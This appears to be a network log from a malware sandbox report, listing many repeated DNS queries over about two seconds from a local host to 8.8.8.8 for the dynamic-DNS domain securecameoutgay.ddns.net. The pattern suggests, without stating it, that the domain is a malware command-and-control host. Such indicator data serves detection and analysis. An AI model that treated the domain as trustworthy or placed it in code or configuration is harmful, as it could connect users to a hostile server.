                                                    Oct 12, 2024 23:06:13.792771101 CEST192.168.2.148.8.8.80xde1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.799365997 CEST192.168.2.148.8.8.80xde1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.806519032 CEST192.168.2.148.8.8.80xde1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.813385010 CEST192.168.2.148.8.8.80xfe6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.820050001 CEST192.168.2.148.8.8.80xfe6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.826767921 CEST192.168.2.148.8.8.80xfe6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.833266973 CEST192.168.2.148.8.8.80xfe6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.840327978 CEST192.168.2.148.8.8.80xfe6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.847511053 CEST192.168.2.148.8.8.80x199aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.854995966 CEST192.168.2.148.8.8.80x199aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.862401962 CEST192.168.2.148.8.8.80x199aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.869194984 CEST192.168.2.148.8.8.80x199aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.875942945 CEST192.168.2.148.8.8.80x199aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.882952929 CEST192.168.2.148.8.8.80xa26eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.889602900 CEST192.168.2.148.8.8.80xa26eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.897001028 CEST192.168.2.148.8.8.80xa26eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.905605078 CEST192.168.2.148.8.8.80xa26eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.912455082 CEST192.168.2.148.8.8.80xa26eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.919346094 CEST192.168.2.148.8.8.80x6a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.929493904 CEST192.168.2.148.8.8.80x6a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.936151981 CEST192.168.2.148.8.8.80x6a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.943151951 CEST192.168.2.148.8.8.80x6a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.950160027 CEST192.168.2.148.8.8.80x6a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.956835032 CEST192.168.2.148.8.8.80x371cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.963686943 CEST192.168.2.148.8.8.80x371cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.970110893 CEST192.168.2.148.8.8.80x371cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.976813078 CEST192.168.2.148.8.8.80x371cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.983464956 CEST192.168.2.148.8.8.80x371cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.990401983 CEST192.168.2.148.8.8.80xdfd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.003015995 CEST192.168.2.148.8.8.80xdfd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.010040045 CEST192.168.2.148.8.8.80xdfd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.016778946 CEST192.168.2.148.8.8.80xdfd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.024225950 CEST192.168.2.148.8.8.80xdfd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.031075001 CEST192.168.2.148.8.8.80x517fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.038959026 CEST192.168.2.148.8.8.80x517fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.046772957 CEST192.168.2.148.8.8.80x517fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.054291964 CEST192.168.2.148.8.8.80x517fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.061148882 CEST192.168.2.148.8.8.80x517fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.068038940 CEST192.168.2.148.8.8.80xe17bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.074522972 CEST192.168.2.148.8.8.80xe17bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.081454039 CEST192.168.2.148.8.8.80xe17bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.088263988 CEST192.168.2.148.8.8.80xe17bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.095657110 CEST192.168.2.148.8.8.80xe17bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.102343082 CEST192.168.2.148.8.8.80xe9b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.109159946 CEST192.168.2.148.8.8.80xe9b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.115911961 CEST192.168.2.148.8.8.80xe9b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.122843981 CEST192.168.2.148.8.8.80xe9b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.129838943 CEST192.168.2.148.8.8.80xe9b9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.136606932 CEST192.168.2.148.8.8.80x1cb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.144246101 CEST192.168.2.148.8.8.80x1cb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.151175976 CEST192.168.2.148.8.8.80x1cb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.157867908 CEST192.168.2.148.8.8.80x1cb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.165842056 CEST192.168.2.148.8.8.80x1cb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.172764063 CEST192.168.2.148.8.8.80x4205Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.179789066 CEST192.168.2.148.8.8.80x4205Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.187406063 CEST192.168.2.148.8.8.80x4205Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.194575071 CEST192.168.2.148.8.8.80x4205Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.201462984 CEST192.168.2.148.8.8.80x4205Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.209498882 CEST192.168.2.148.8.8.80x593eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.216464996 CEST192.168.2.148.8.8.80x593eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.223042011 CEST192.168.2.148.8.8.80x593eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.229695082 CEST192.168.2.148.8.8.80x593eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.237684965 CEST192.168.2.148.8.8.80x593eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.244617939 CEST192.168.2.148.8.8.80xa34bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.251893044 CEST192.168.2.148.8.8.80xa34bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.260426998 CEST192.168.2.148.8.8.80xa34bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.267026901 CEST192.168.2.148.8.8.80xa34bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.273869991 CEST192.168.2.148.8.8.80xa34bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.280899048 CEST192.168.2.148.8.8.80xa9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.288444996 CEST192.168.2.148.8.8.80xa9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.295262098 CEST192.168.2.148.8.8.80xa9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.301822901 CEST192.168.2.148.8.8.80xa9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.308371067 CEST192.168.2.148.8.8.80xa9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.314985991 CEST192.168.2.148.8.8.80x9c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.321808100 CEST192.168.2.148.8.8.80x9c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.328587055 CEST192.168.2.148.8.8.80x9c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.334860086 CEST192.168.2.148.8.8.80x9c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.341509104 CEST192.168.2.148.8.8.80x9c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.348036051 CEST192.168.2.148.8.8.80x174dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.354460955 CEST192.168.2.148.8.8.80x174dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.361213923 CEST192.168.2.148.8.8.80x174dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.367821932 CEST192.168.2.148.8.8.80x174dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.374500036 CEST192.168.2.148.8.8.80x174dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.381958008 CEST192.168.2.148.8.8.80x9f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.388411999 CEST192.168.2.148.8.8.80x9f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.395124912 CEST192.168.2.148.8.8.80x9f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.401643038 CEST192.168.2.148.8.8.80x9f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.408638000 CEST192.168.2.148.8.8.80x9f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.415363073 CEST192.168.2.148.8.8.80xe48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.422768116 CEST192.168.2.148.8.8.80xe48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.429302931 CEST192.168.2.148.8.8.80xe48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.435725927 CEST192.168.2.148.8.8.80xe48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.443835974 CEST192.168.2.148.8.8.80xe48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.451108932 CEST192.168.2.148.8.8.80x8fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.457659006 CEST192.168.2.148.8.8.80x8fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.464153051 CEST192.168.2.148.8.8.80x8fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.470738888 CEST192.168.2.148.8.8.80x8fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.477303982 CEST192.168.2.148.8.8.80x8fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.483917952 CEST192.168.2.148.8.8.80xba1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.490648985 CEST192.168.2.148.8.8.80xba1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.497028112 CEST192.168.2.148.8.8.80xba1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.503453970 CEST192.168.2.148.8.8.80xba1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.510449886 CEST192.168.2.148.8.8.80xba1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.517461061 CEST192.168.2.148.8.8.80xde84Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.524296045 CEST192.168.2.148.8.8.80xde84Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.530806065 CEST192.168.2.148.8.8.80xde84Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.537303925 CEST192.168.2.148.8.8.80xde84Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.543926001 CEST192.168.2.148.8.8.80xde84Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.551131010 CEST192.168.2.148.8.8.80xfa1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.558079958 CEST192.168.2.148.8.8.80xfa1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.564886093 CEST192.168.2.148.8.8.80xfa1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.571687937 CEST192.168.2.148.8.8.80xfa1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.578700066 CEST192.168.2.148.8.8.80xfa1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.585274935 CEST192.168.2.148.8.8.80x599fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.591692924 CEST192.168.2.148.8.8.80x599fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.602511883 CEST192.168.2.148.8.8.80x599fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.609045982 CEST192.168.2.148.8.8.80x599fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.615773916 CEST192.168.2.148.8.8.80x599fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.626410007 CEST192.168.2.148.8.8.80xc740Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.640408039 CEST192.168.2.148.8.8.80xc740Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.647022009 CEST192.168.2.148.8.8.80xc740Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.653383970 CEST192.168.2.148.8.8.80xc740Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.659960985 CEST192.168.2.148.8.8.80xc740Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.666830063 CEST192.168.2.148.8.8.80x5303Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.673337936 CEST192.168.2.148.8.8.80x5303Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.680094957 CEST192.168.2.148.8.8.80x5303Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.686717987 CEST192.168.2.148.8.8.80x5303Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.693399906 CEST192.168.2.148.8.8.80x5303Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.700107098 CEST192.168.2.148.8.8.80xfe15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.706634998 CEST192.168.2.148.8.8.80xfe15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.713200092 CEST192.168.2.148.8.8.80xfe15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.719887018 CEST192.168.2.148.8.8.80xfe15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.726846933 CEST192.168.2.148.8.8.80xfe15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.733108997 CEST192.168.2.148.8.8.80x19a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.739711046 CEST192.168.2.148.8.8.80x19a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.747133017 CEST192.168.2.148.8.8.80x19a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.754249096 CEST192.168.2.148.8.8.80x19a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.761636972 CEST192.168.2.148.8.8.80x19a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.768556118 CEST192.168.2.148.8.8.80xb7deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.774991989 CEST192.168.2.148.8.8.80xb7deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.781306028 CEST192.168.2.148.8.8.80xb7deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.787755966 CEST192.168.2.148.8.8.80xb7deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.794339895 CEST192.168.2.148.8.8.80xb7deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.800862074 CEST192.168.2.148.8.8.80x8325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.807962894 CEST192.168.2.148.8.8.80x8325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.815129995 CEST192.168.2.148.8.8.80x8325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.822063923 CEST192.168.2.148.8.8.80x8325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.828895092 CEST192.168.2.148.8.8.80x8325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.835397005 CEST192.168.2.148.8.8.80x162eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.841914892 CEST192.168.2.148.8.8.80x162eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.848484993 CEST192.168.2.148.8.8.80x162eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.855099916 CEST192.168.2.148.8.8.80x162eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.861854076 CEST192.168.2.148.8.8.80x162eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.868442059 CEST192.168.2.148.8.8.80x5421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.875163078 CEST192.168.2.148.8.8.80x5421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.881827116 CEST192.168.2.148.8.8.80x5421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.888349056 CEST192.168.2.148.8.8.80x5421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.895030022 CEST192.168.2.148.8.8.80x5421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.901750088 CEST192.168.2.148.8.8.80xd74eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.908387899 CEST192.168.2.148.8.8.80xd74eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.915184021 CEST192.168.2.148.8.8.80xd74eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.921755075 CEST192.168.2.148.8.8.80xd74eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.928457975 CEST192.168.2.148.8.8.80xd74eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.936005116 CEST192.168.2.148.8.8.80xcb93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.943115950 CEST192.168.2.148.8.8.80xcb93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.949662924 CEST192.168.2.148.8.8.80xcb93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.955960035 CEST192.168.2.148.8.8.80xcb93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.962990046 CEST192.168.2.148.8.8.80xcb93Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.970170021 CEST192.168.2.148.8.8.80xdbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.977098942 CEST192.168.2.148.8.8.80xdbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.984060049 CEST192.168.2.148.8.8.80xdbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.991108894 CEST192.168.2.148.8.8.80xdbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:14.997849941 CEST192.168.2.148.8.8.80xdbe0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.005652905 CEST192.168.2.148.8.8.80xc623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.012521982 CEST192.168.2.148.8.8.80xc623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.019431114 CEST192.168.2.148.8.8.80xc623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.026520014 CEST192.168.2.148.8.8.80xc623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.033217907 CEST192.168.2.148.8.8.80xc623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.040250063 CEST192.168.2.148.8.8.80x84abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.046689034 CEST192.168.2.148.8.8.80x84abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.053600073 CEST192.168.2.148.8.8.80x84abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.060542107 CEST192.168.2.148.8.8.80x84abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.067574024 CEST192.168.2.148.8.8.80x84abStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.074589014 CEST192.168.2.148.8.8.80x42d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.081237078 CEST192.168.2.148.8.8.80x42d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.088377953 CEST192.168.2.148.8.8.80x42d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.094944000 CEST192.168.2.148.8.8.80x42d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.101650953 CEST192.168.2.148.8.8.80x42d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
